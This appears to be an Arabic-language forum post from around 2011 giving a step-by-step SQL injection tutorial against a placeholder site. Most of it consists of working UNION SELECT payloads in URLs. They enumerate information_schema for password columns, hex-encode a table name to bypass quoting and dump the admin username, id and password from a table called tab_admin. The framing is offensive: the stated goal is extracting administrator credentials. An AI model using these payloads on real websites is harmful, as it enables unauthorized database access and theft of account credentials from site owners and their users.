شوف اخي نمشي خطوة خطوة
مثلا معانا موقع وكان اصدار قاعدة البيانات 5 وكان عدد الاعمدة 8
مثلا معنا هالموقع
كود:
http://xxxx.com/index.php?id=1+union+select+1,2,3,4,5,6,7,8--
مثلا العمود المصاب رقم 2
احنا بدنا نطلع الجداول وبالتحديد جدول اليوزر الي يطلعلنا بيانات الادمن
كود:
http://xxxx.com/index.php?id=1+union+select+1,group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
والان طلعت معانا جداول كثيرة
users:password:system
tab_admin:password:system
info:level:system
احنا نشوف مين فيهم يطلعلنا معلومات الادمن نحنا مثلا نشوف انو هاد راح يطلعلنا كل معلومات الادمن
tab_admin
احنا نفوت نشفرها بموقع التشفير
احنا شفرناها وكل شيء تمام
كود:
http://xxxx.com/index.php?id=1+union+select+1,group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7461625f61646d696e
الان طلع معانا معلومات كثير
id
username
password
email
وهيك
id=رقم العضوية
username=اسم الادمن
password=باس الادمن
يعني راح نعمل هيك
كود:
http://xxxx.com/index.php?id=1+union+select+1,group_concat(username,0x3a,id,0x3a,password),3,4,5,6,7,8+from+tab_admin
طيب الان طلعت معانا اليوزر والباس راح يكون هيك
مثلا اليوزر طلع admin
رقم العضوية 1
الباس 123456
اتمنى تكون وصلت الفكرة
02-04-2011, 12:50 AM
غير مجاب: مشكلة في sql !! 
العرض العادي
